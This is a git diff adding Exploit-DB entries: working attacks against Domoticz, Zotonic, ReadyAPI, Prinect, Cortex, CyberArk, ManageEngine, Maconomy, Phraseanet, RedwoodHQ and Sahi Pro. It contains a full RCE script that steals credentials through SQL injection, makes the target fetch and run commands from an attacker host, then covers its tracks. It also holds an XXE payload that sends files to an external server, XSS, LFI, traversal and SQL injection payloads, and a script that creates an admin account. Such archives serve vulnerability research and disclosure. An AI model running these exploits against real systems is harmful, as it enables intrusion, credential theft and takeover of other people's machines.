+    description="""Unauthenticated Remote Command Execution on Domoticz!
+    (version <= 4.10577) Bypass authentication, inject os commands and execute them!""",
+    epilog="""The default mode (1) insert the commands in a script and reply 
+    with it once to an HTTP request, use -H address and -P port.
+    The -zipcmd (2) or -direct (3) option override the default mode.""")
+parser.add_argument('-noexec', action='store_true', help='no cmd injection, just steal credentials')
+parser.add_argument('-zipcmd', action='store_true', help='upload a zip icon pack with commands inside (2)')
+parser.add_argument('-direct', action='store_true', help='inject commands directly in uvc params (3)')
+parser.add_argument('-H', dest='lhost', type=str, help='address/name of attacker host in default mode (1)')
+parser.add_argument('-P', dest='lport', type=int, help='tcp port of attacker host in default mode (1)')
+parser.add_argument('-path', dest='path', type=str, default='/src/domoticz',
+    help='change root path of domoticz to find the uploaded icon(script). Useful only with -zipcmd option')
+parser.add_argument('-f', action='store_true', help='shut up and do it')
+parser.add_argument('url', metavar='URL', nargs=1, type=str, help='target URL e.g.: http://localhost:8080/')
+parser.add_argument('cmd', metavar='cmd', nargs='+', type=str, help='os command to execute, '
+    'send it in background or do a short job, the domoticz web server will hang during execution')
+args  = parser.parse_args()
+if not(args.direct or args.zipcmd) and (args.lhost is None or args.lport is None):
+    print '[-] Default mode needs host (-H) and port (-P) of attacker to download the commands'
+    exit(0)
+username = ''
+password = ''
+cookies = dict()
+noauth  = True
+sqlpref = 'UNION SELECT sValue FROM Preferences WHERE Key="%s" -- '
+cmd = args.cmd
+url = args.url[0][:-1] if args.url[0][-1]=='/' else args.url[0]
+url_sqlinj  = url + '/images/floorplans/plan?idx=1 '
+url_login   = url + '/json.htm?type=command&param=logincheck&username=%s&password=%s&rememberme=true'
+url_getconf = url + '/json.htm?type=settings'
+url_setconf = url + '/storesettings.webem'
+url_iconupl = url + '/uploadcustomicon'
+url_camjson = url + '/json.htm?type=cameras'
+url_camlive = url + '/camsnapshot.jpg?idx='
+url_camadd  = url + '/json.htm?type=command&param=addcamera&address=127.0.0.1&port=8080' \
+    '&name=uvccam&enabled=true&username=&password=&imageurl=dXZjY2FwdHVyZS5jZ2k%3D&protocol=0'
+cmd_zipicon = ['chmod 777 %s/www/images/fakeicon48_On.png' % args.path,
+    '%s/www/images/fakeicon48_On.png' % args.path]
+cmd_default = ['curl %s -o /tmp/myexec.sh -m 5', 'chmod 777 /tmp/myexec.sh', '/tmp/myexec.sh']
+
+#--------------------------------------------------------------------
+# AUTHENTICATION BYPASS
+#--------------------------------------------------------------------
+session = requests.Session()
+r = session.get(url_getconf)
+if r.status_code == 401:
+    noauth = False
+    username = steal_dbdata('WebUserName')
+    password = steal_dbdata('WebPassword')
+    cookies['SID'] = dologin(username, password)
+    r = session.get(url_getconf)
+if args.noexec is True:
+    exit(0)
+settings = json.loads(r.text)
+settings.pop('UVCParams', None)
+#--------------------------------------------------------------------
+# Fix necessary to not break or lose settings
+chn = {'WebTheme':'Themes','UseAutoBackup':'enableautobackup','UseAutoUpdate':'checkforupdates'}
+for k in chn:
+    settings[chn[k]] = settings.pop(k, None)
+sub = settings.pop('MyDomoticzSubsystems', 0)
+if sub >= 4:
+    settings['SubsystemApps'] = 4; sub -= 4
+if sub >= 2:
+    settings['SubsystemShared'] = 2; sub -= 2
+if sub == 1:
+    settings['SubsystemHttp'] = 1  
+try:    
+    settings['HTTPURL'] = base64.b64decode(settings['HTTPURL'])
+    settings['HTTPPostContentType'] = base64.b64decode(settings['HTTPPostContentType'])
+    settings['Latitude'] = settings['Location']['Latitude']
+    settings['Longitude'] = settings['Location']['Longitude']
+    settings.pop('Location', None)
+except:
+    pass
+toOn  = ['allow','accept','hide','enable','disable','trigger','animate','show']
+toOn += ['usee','floorplanfullscreen','senderrorsasn','emailasa','checkforupdates']
+for k in [x for x in settings if any([y for y in toOn if y in x.lower()])]:
+    if(str(settings[k]) == '1'):
+        settings[k] = 'on'
+    elif(str(settings[k]) == '0'):
+        settings.pop(k, None)
+
+#--------------------------------------------------------------------
+# COMMAND INJECTION
+#--------------------------------------------------------------------
+cmdwrap = '\n'.join(['#!/bin/bash'] + cmd)
+payload = urllib.urlencode(settings) + '&'
+if cmd[-1][-1] != '&' and not args.direct:
+    prompt_msg('if not sent in background the commands may block domoticz')
+if args.direct:
+    prompt_msg('in direct mode & pipe redirect are not allowed (may block domoticz)')
+elif args.zipcmd:
+    fakezip = create_zip(cmdwrap)
+    files = [('file',(fakezip, open(fakezip,'rb'), 'application/zip'))]
+    r = session.post(url_iconupl, files=files)
+    cmd = cmd_zipicon
+else:
+    httpd = BaseHTTPServer.HTTPServer(("", args.lport), SingleHandler)
+    SingleHandler.respbody = cmdwrap
+    thread.start_new_thread(httpd.handle_request, ())
+    cmd_default[0] = cmd_default[0] % ('http://%s:%d/' % (args.lhost,args.lport))
+    cmd = cmd_default
+# Encode the space and send the others in clear (chars like <>&;| not allowed)
+cmdencode = '\n'.join([x.replace(' ', '+') for x in cmd])
+payload += 'UVCParams=-d+/dev/aaa\n%s\n#' % (cmdencode)
+req = requests.Request('POST', url_setconf, data=payload, cookies=cookies)
+r = session.send(req.prepare())
+print '[+] Commands successfully injected'
+
+#--------------------------------------------------------------------
+# COMMAND EXECUTION
+#--------------------------------------------------------------------
+if noauth:
+    session.cookies.clear() # fix if authentication is disabled
+cam = get_uvc_cam()
+if cam is None:
+    print '[+] Adding new UVC camera'
+    r = session.get(url_camadd)
+    cam = get_uvc_cam()
+print '[+] Execution on cam with idx: ' + str(cam['idx'])
+r = session.get(url_camlive + str(cam['idx']))
+# Restore the default UVC parameters (like a ninja)
+settings['UVCParams'] = '-S80 -B128 -C128 -G80 -x800 -y600 -q100'
+session.post(url_setconf, data=settings)
+print '[+] Done! Restored default uvc params!'
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46788.txt b/exploits/multiple/webapps/46788.txt
new file mode 100644
index 000000000..b1d5ca9f0
--- /dev/null
+++ b/exploits/multiple/webapps/46788.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Zotonic <=0.46 mod_admin (Erlang) - Reflective Cross-Site Scripting
+# Date: 24-04-2019
+# Exploit Author: Ramòn Janssen
+# Researchers: Jan-martin Sijs, Joost Quist, Joost Vondeling, Ramòn Janssen
+# Vendor Homepage: http://zotonic.com/
+# Software Link: https://github.com/zotonic/zotonic/releases/tag/0.46.0
+# Version: <=0.46
+# CVE : CVE-2019-11504
+
+Attack type
+Remote
+
+Impact
+Code Execution
+
+Zotonic versions prior to 0.47 have multiple authenticated Reflected Cross-Site Scripting (XSS) vulnerabilities in the management module. The vulnerabilitie can be exploited when an authenticated user with administrative permissions visits the crafted URL (i.e. when phished or visits a website containing the URL). The XSS effects the following URLs and parameters of the management module:
+- /admin/overview/ [qcat, qcustompivot, qs]
+- /admin/users/ [qs]
+- /admin/media/ [qcat,qcustompivot, qs]
+
+Example: https://[host]/admin/overview?qcustompivot="><script>prompt(‘XSS’)</script>
+
+Affected source code file zotonic_mod_admin:
+- zotonic_mod_admin_identity\priv\templates\_admin_sort_header.tpl
+- zotonic_mod_admin_identity\priv\templates\admin_users.tpl
+
+Reference(s)
+http://docs.zotonic.com/en/latest/developer-guide/releasenotes/rel_0.47.0.html
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46796.txt b/exploits/multiple/webapps/46796.txt
new file mode 100644
index 000000000..9ab20af2f
--- /dev/null
+++ b/exploits/multiple/webapps/46796.txt
@@ -0,0 +1,96 @@
+<!--
+# Exploit Title: ReadyAPI Remote Code Execution Vulnerability.
+# Date: May, 2019
+# Exploit Author: Gilson Camelo => https://twitter.com/gscamelo
+# Vendor Homepage: https://smartbear.com/product/ready-api
+# Software Link: https://smartbear.com/product/ready-api/overview/
+# Github: https://github.com/gscamelo/CVE-2018-20580
+# Version: 2.5.0 and 2.6.0
+# Tested on: Windows
+# CVE : CVE-2018-20580
+
+I found a new vulnerability in the (ReadyAPI). It allows an attacker to
+execute a remote code on the local machine putting in danger the ReadyAPI
+users including developers, pentesters, etc...
+
+The ReadyAPI allows users to open a SOAP project and import WSDL files that
+help the users to communicate with the remote server easily.
+
+The WSDL file owner can determine default values of some parameters. An
+attacker can impersonate a legitimate web service and inject a malicious
+code into a default value of one of the parameters and spread it to
+ReadyAPI clients.
+
+When a ReadyAPI client load a malicious WSDL file to his project and send a
+request containing the malicious code the ReadyAPI will execute the
+malicious code on the victim's computer.
+
+The attack scenario:
+
+An attacker impersonates a regular web service with a WSDL containing the
+malicious code.
+The victim creates a new project in the ReadyAPI and loads the malicious
+WSDL File.
+The victim decides to send a request to the remote server and the ReadyAPI
+execute the malicious code.
+The attacker succeeds in executing malicious code in the victim's machine
+and take it over.
+-->
+
+<?xml version="1.0" encoding="UTF-8"?>
+<wsdl:definitions
+                xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/"
+                xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
+                xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/"
+                xmlns:tns="http://example.com/stockquote.wsdl"
+                xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
+                xmlns:s="http://www.w3.org/2001/XMLSchema"
+                xmlns:http="http://schemas.xmlsoap.org/wsdl/http/"
+                targetNamespace="http://example.com/stockquote.wsdl"
+                xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">
+
+  <wsdl:types>
+    <s:schema elementFormDefault="qualified" targetNamespace="http://example.com/stockquote.wsdl">
+      <s:element name="Malicious_Request">
+        <s:complexType>
+          <s:sequence>
+            <s:element name="Payload" default="PWNED" type="s:string" />
+          </s:sequence>
+        </s:complexType>
+      </s:element>
+
+    </s:schema>
+  </wsdl:types>
+  <wsdl:message name="Malicious_RequestSoapIn">
+    <wsdl:part name="parameters" element="tns:Malicious_Request" />
+  </wsdl:message>
+
+  <wsdl:portType name="Exploit">
+    <wsdl:operation name="Malicious_Request">
+      <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">Create a new xpl</wsdl:documentation>
+      <wsdl:input message="tns:Malicious_RequestSoapIn" />
+      <wsdl:output message="tns:Malicious_RequestSoapOut" />
+    </wsdl:operation>
+  </wsdl:portType>
+
+  <wsdl:binding name="Exploit" type="tns:Exploit">
+    <soap:binding transport="http://schemas.xmlsoap.org/soap/http" />
+    <wsdl:operation name="Malicious_Request">
+      <soap:operation soapAction="https://www.test.com.br/Malicious_Request" style="document" />
+      <wsdl:input>
+        <soap:body use="literal" />
+      </wsdl:input>
+      <wsdl:output>
+        <soap:body use="literal" />
+      </wsdl:output>
+    </wsdl:operation>
+  </wsdl:binding>
+
+  <wsdl:service name="XPL">
+    <wsdl:documentation xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/">My first Exploit</wsdl:documentation>
+    <wsdl:port name="Exploit" binding="tns:Exploit">
+      <soap:address location="http%3A%2F%2F127.0.0.1%2F%24%7B%3DRuntime.getRuntime%28%29.exec%28%27calc.exe%27%29%7D%3B" />
+    </wsdl:port>
+
+  </wsdl:service>
+</wsdl:definitions>
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46804.txt b/exploits/multiple/webapps/46804.txt
new file mode 100644
index 000000000..b6cde369e
--- /dev/null
+++ b/exploits/multiple/webapps/46804.txt
@@ -0,0 +1,98 @@
+Details
+================
+Software: Prinect Archive System 
+Version: v2015 Release 2.6 
+Homepage: https://www.heidelberg.com
+Advisory report: https://github.com/alt3kx/CVE-2019-10685
+CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10685
+CVSS: 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+CWE-79
+
+Description
+================
+A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Print Archive System v2015 release 2.6
+
+Vulnerability
+================
+The user supplied input containing JavaScript is echoed back in JavaScript code in an HTML response via the "TextField" parameter.
+
+Proof of concept
+================
+
+Reflected XSS
+Payload: %3cscript%3ealert(1)%3c%2fscript%3e
+
+The offending GET request is: 
+
+GET /am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2 HTTP/1.1
+Host: victim_IP:8090
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F
+
+Reflected XSS Reponse: 
+
+HTTP/1.1 200 OK
+Server: Apache-Coyote/1.1
+Content-Type: text/html;charset=UTF-8
+Date: Mon, 04 Feb 2019 13:15:12 GMT
+Connection: close
+
+[../snip]
+
+id="msgContainer">Authentication failed for: <script>alert(1)</script> <br/>Click Help button for more information about login permissions.</div>
+
+# curl -i -s -k -X GET
+
+-H "Host: victim:8090" 
+-H "Accept-Encoding: gzip, deflate" 
+-H "Accept: */*" 
+-H "Accept-Language: en-US,en-GB;q=0.9,en;q=0.8" 
+-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 
+-H "Connection: close" 
+-H "Cookie: JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
+-b "JSESSIONID=C665EA9A7594E736D39C93EA8763A01F" 
+"http://victim:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2" 
+--proxy http://127.0.0.1:8080
+
+Final payload into URL:
+ 
+http://victim_IP:8090/am/Login,loginForm.sdirect?formids=TextField%2cTextField_0%2clink&submitmode=&submitname=&TextField=%3cscript%3ealert(1)%3c%2fscript%3e&TextField_0=l0V%21i1s%21C2
+
+Mitigations
+================
+No more feedback from the vendor:
+https://www.heidelberg.com
+
+Disclosure policy
+================
+We believes in responsible disclosure.
+Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. 
+
+This vulnerability will be published if we do not receive a response to this report with 10 days.
+
+Timeline
+================
+
+2019-02-04: Discovered
+2019-02-25: Retest PRO environment
+2019-03-25: Retest on researcher's ecosystem
+2019-04-02: Vendor notification
+2019-04-03: Vendor feedback received
+2019-04-08: Reminder sent
+2019-04-08: 2nd reminder sent 
+2019-04-11: Internal communication
+2019-04-26: No more feedback received from the vendor
+2019-05-30: New issues found
+2019-06-30: Public Disclosure
+
+Discovered by:
+Alex Hernandez aka alt3kx:
+================
+Please visit https://github.com/alt3kx for more information.
+
+My current exploit list @exploit-db: 
+https://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46820.txt b/exploits/multiple/webapps/46820.txt
new file mode 100644
index 000000000..9043b15b7
--- /dev/null
+++ b/exploits/multiple/webapps/46820.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery
+# Date: 2/26/2019
+# Exploit Author: Alexandre Basquin
+# Vendor Homepage: https://blog.thehive-project.org
+# Software Link: https://github.com/TheHive-Project/Cortex
+# Version: Cortex <= 2.1.3
+# Tested on: 2.1.3
+# CVE : CVE-2019-7652
+
+# Exploit description
+
+The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability 
+
+
+POC:
+
+1. Create a new analysis
+
+2. Select Data Type "URL"
+
+3. Put your SSRF payload in the Data parameter (e.g. "http://127.0.0.1:22")
+
+4. Result can be seen in the main dashboard.
+
+
+Reported to TheHive Project by Alexandre Basquin on 1/24/2019
+
+The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2
+
+References:
+
+https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46828.txt b/exploits/multiple/webapps/46828.txt
new file mode 100644
index 000000000..a2d5193b8
--- /dev/null
+++ b/exploits/multiple/webapps/46828.txt
@@ -0,0 +1,97 @@
+# Exploit Title: CyberArk XML External Entity (XXE) Injection in SAML
+authentication
+# Date: 10/05/2019
+# Exploit Author: Marcelo Toran (@spamv)
+# Vendor Homepage: https://www.cyberark.com
+# Version: <=10.7
+# CVE : CVE-2019-7442
+
+
+-----------Product description
+The CyberArk Enterprise Password Vault is a privileged access security
+solution to store, monitor and rotate credentials. The main objective
+of the solution is protecting the privileged accounts that are used to
+administrate the systems of the organisations.
+
+-----------Vulnerability description
+This vulnerability allows remote attackers to disclose sensitive
+information or potentially bypass the authentication system.
+
+-----------Vulnerability Details
+# Exploit Title: XML External Entity (XXE) Injection in SAML authentication
+# Affected Component: Password Vault Web Access (PVWA)
+# Affected Version: <=10.7
+# Vendor: CyberArk
+# Vendor Homepage: https://www.cyberark.com
+# Date: 18/12/2018
+# CVSS Base Score: 7.5 (High)
+# CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Exploit Author: Marcelo Torán (Nixu Corporation)
+# CVE: CVE-2019-7442
+# CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7442
+
+-----------Technical Description
+It has been found that the XML parser of the SAML authentication
+system of the Password Vault Web Access (PVWA) is vulnerable to XML
+External Entity (XXE) attacks via a crafted DTD. No user interaction
+or privileges are required as the vulnerability is triggered in
+pre-authentication.
+The vulnerable component is: https://example.com/PasswordVault/auth/saml
+The vulnerable argument: SAMLResponse
+
+-----------POC
+
+# pepe.dtd is an external entity stored in a remote web server where we define the file that will be read and the server that will be used for the exfiltration:
+<!ENTITY % data SYSTEM "file:///C:/Windows/win.ini">
+<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://externalserver.com/?%data;'>">
+ 
+ 
+# The malicious XML payload where is defined the address of the external entity defined in the previous step:
+<!DOCTYPE r [
+<!ELEMENT r ANY >
+<!ENTITY % sp SYSTEM "http://externalserver.com/pepe.dtd">
+%sp;
+ 
+%param1;
+ 
+]>
+<r>&exfil;</r>
+ 
+ 
+# XML payload base64 encoded + equal symbols URL encoded:
+PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d
+ 
+ 
+# CURL command to exploit the XXE:
+curl -i -s -k  -X $'POST' \
+    -H $'Host: example.com' -H $'User-Agent: PoC CyberArk XXE Injection :(' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 177' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
+    --data-binary $'SAMLResponse=PCFET0NUWVBFIHIgWwo8IUVMRU1FTlQgciBBTlkgPgo8IUVOVElUWSAlIHNwIFNZU1RFTSAiaHR0cDovL2V4dGVybmFsc2VydmVyLmNvbS9wZXBlLmR0ZCI+CiVzcDsKJXBhcmFtMTsKXT4KPHI+JmV4ZmlsOzwvcj4%3d' \
+    $'https://example.com/PasswordVault/auth/saml/'
+ 
+ 
+# Checking the logs of the external server:
+example.com - - [XX/XX/XX XX:XX:XX] "GET /pepe.dtd HTTP/1.1" 200 -
+example.com - - [XX/XX/XX XX:XX:XX] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5Bfiles%5D%0D%0A%5BMail%5D%0D%0AMAPI=1 HTTP/1.1" 200 -
+ 
+ 
+# And decoding the content of the logs it's possible to read the requested file of the machine:
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+
+-----------Timeline
+18/12/2018 – Vulnerability discovered
+10/01/2019 – Vendor notified
+23/01/2019 – Vulnerability accepted
+05/02/2019 – CVE number requested
+05/02/2019 – CVE number assigned
+19/02/2019 – Vendor released a patch
+19/02/2019 – Advisory released
+
+-----------Proof of Concept (PoC)
+
+https://www.octority.com/2019/05/07/cyberark-enterprise-password-vault-xml-external-entity-xxe-injection/
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46894.txt b/exploits/multiple/webapps/46894.txt
new file mode 100644
index 000000000..3a0fd421b
--- /dev/null
+++ b/exploits/multiple/webapps/46894.txt
@@ -0,0 +1,12 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus < 10.5 Incorrect Access Control
+# Date: 2019-05-21
+# Exploit Author: Enter of VinCSS (Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus < 10.5
+# CVE : CVE-2019-12252
+
+
+
+In Zoho ManageEngine ServiceDesk Plus through 10.5, users with the lowest privileges (guest) can view an arbitrary post by appending its number to the 
+
+SDNotify.do?notifyModule=Solution&mode=E-Mail&notifyTo=SOLFORWARD&id= substring
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46895.txt b/exploits/multiple/webapps/46895.txt
new file mode 100644
index 000000000..bdbb727e3
--- /dev/null
+++ b/exploits/multiple/webapps/46895.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting
+# Date: 2019-05-21
+# Exploit Author: Enter of VinCSS (Vingroup)
+# Vendor Homepage: https://www.manageengine.com/products/service-desk
+# Version: Zoho ManageEngine ServiceDesk Plus 9.3
+# CVE : CVE-2019-12189
+
+
+An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do search field.
+
+The vulnerability stems from the confusion of both single quotes and semicolon in the query string of the URL.
+
+payload: ';alert('XSS');' Attack vector: http:///site.com/SearchN.do
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46931.txt b/exploits/multiple/webapps/46931.txt
new file mode 100644
index 000000000..bbf20a27b
--- /dev/null
+++ b/exploits/multiple/webapps/46931.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Maconomy Erp local file include
+# Date: 22/05/2019
+# Exploit Author: JameelNabbo
+# Website: jameelnabbo.com
+# Vendor Homepage: https://www.deltek.com
+# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
+# CVE: CVE-2019-12314
+POC:
+
+POC:
+http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
+Example
+http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46935.txt b/exploits/multiple/webapps/46935.txt
new file mode 100644
index 000000000..3b7e7084b
--- /dev/null
+++ b/exploits/multiple/webapps/46935.txt
@@ -0,0 +1,20 @@
+# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software
+# Date: 10/10/2018
+# Exploit Author: Krzysztof Szulski
+# Vendor Homepage: https://www.phraseanet.com
+# Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below
+# Version fixed: 4.0.7
+# Proof of concept.
+
+Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license.
+Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document.
+A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be:
+"><svg onload=alert(1)>.jpg
+or:
+"><svg onload=alert(document.cookie)>.jpg
+Please notice that the file name should start from double quotation mark.
+Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website.
+Another example of more malicious usage would be this file name:
+"><svg onload=window.history.back()>.jpg
+From now on every attempt to login will end up with redirection one step back - to login page.
+Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/46992.py b/exploits/multiple/webapps/46992.py
new file mode 100755
index 000000000..3db64da20
--- /dev/null
+++ b/exploits/multiple/webapps/46992.py
@@ -0,0 +1,78 @@
+# -*- encoding: utf-8 -*-
+#!/usr/bin/python3
+
+# Exploit Title:   RedxploitHQ (Create Admin User by missing authentication on db)
+# Date: 	       14-june-2019
+# Exploit Author:  EthicalHCOP
+# Version: 	       2.0 / 2.5.5
+# Vendor Homepage: https://redwoodhq.com/
+# Software Link:   https://redwoodhq.com/redwood-download/
+# Tested on: 	   Ubuntu and Windows.
+# Twitter:	       @EthicalHcop
+# Usage:           python3 RedxploitHQ.py -H mongo_host -P mongo_port
+# Description: 	   Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework
+# 
+# RedwoodHQ doesn't require that MongoDB is installed on the machine because this tool have  her own Mongo Launcher. 
+# The problem is that this vendor database doesn't require any authentication to read her data. 
+# So, I use the same syntax that use the Framework to create my admin user on the database and access into the tool
+# 
+# POC:             https://youtu.be/MK9AvoJDtxY
+
+import hashlib
+import hmac
+import optparse
+from pymongo import MongoClient
+
+def CreateHMAC(Pass):
+    message = bytes(Pass,encoding='utf8')
+    secret = bytes('redwood',encoding='utf8')
+    hash = hmac.new(secret, message, hashlib.md5)
+    return (hash.hexdigest())
+
+def DbConnect(ip,port):
+    uri = "mongodb://" + ip + ":" + port + "/"
+    con = MongoClient(uri)
+    return con
+
+def DbDisconnect(con):
+    con.close()
+
+def CreateBadminUser(ip, port, user, passw):
+    con = DbConnect(ip, port)
+    db = con.automationframework
+    usr = db.users
+    passw = CreateHMAC(passw)
+    data = {
+        "name": user,
+        "password": passw,
+        "tag": [],
+        "role": "Admin",
+        "username": user,
+        "status": ""
+    }
+    usr.insert_one(data)
+    DbDisconnect(con)
+
+def start():
+    parser = optparse.OptionParser('usage %prog ' + \
+                                   '-H host -P port')
+    parser.add_option('-P', '--Port', dest='port', type='string', \
+                      help='MongoDB Port')
+    parser.add_option('-H', '--Host', dest='host', type='string', \
+                      help='MongoDB Host')
+    (options, args) = parser.parse_args()
+    ip = options.host
+    port = options.port
+    if (str(ip) == "None"):
+        print("Insert Host")
+        exit(0)
+    if (str(port) == "None"):
+        port = "27017"
+    try:
+        CreateBadminUser(str(ip), str(port), 'Badmin', 'Badmin')
+        print("[+] New user 'Badmin'/'Badmin' created.")
+    except Exception as e:
+        print("[-] Can't create the 'Badmin'/'Badmin' user. Error: "+str(e))
+
+if __name__ == '__main__':
+    start()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47005.txt b/exploits/multiple/webapps/47005.txt
new file mode 100644
index 000000000..45c67633e
--- /dev/null
+++ b/exploits/multiple/webapps/47005.txt
@@ -0,0 +1,22 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20470
+
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47006.txt b/exploits/multiple/webapps/47006.txt
new file mode 100644
index 000000000..cef0faafa
--- /dev/null
+++ b/exploits/multiple/webapps/47006.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20469
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.
+
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.
+
+http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47007.txt b/exploits/multiple/webapps/47007.txt
new file mode 100644
index 000000000..c7d442d2d
--- /dev/null
+++ b/exploits/multiple/webapps/47007.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20472
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/
+
+DESCRIPTION :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS.
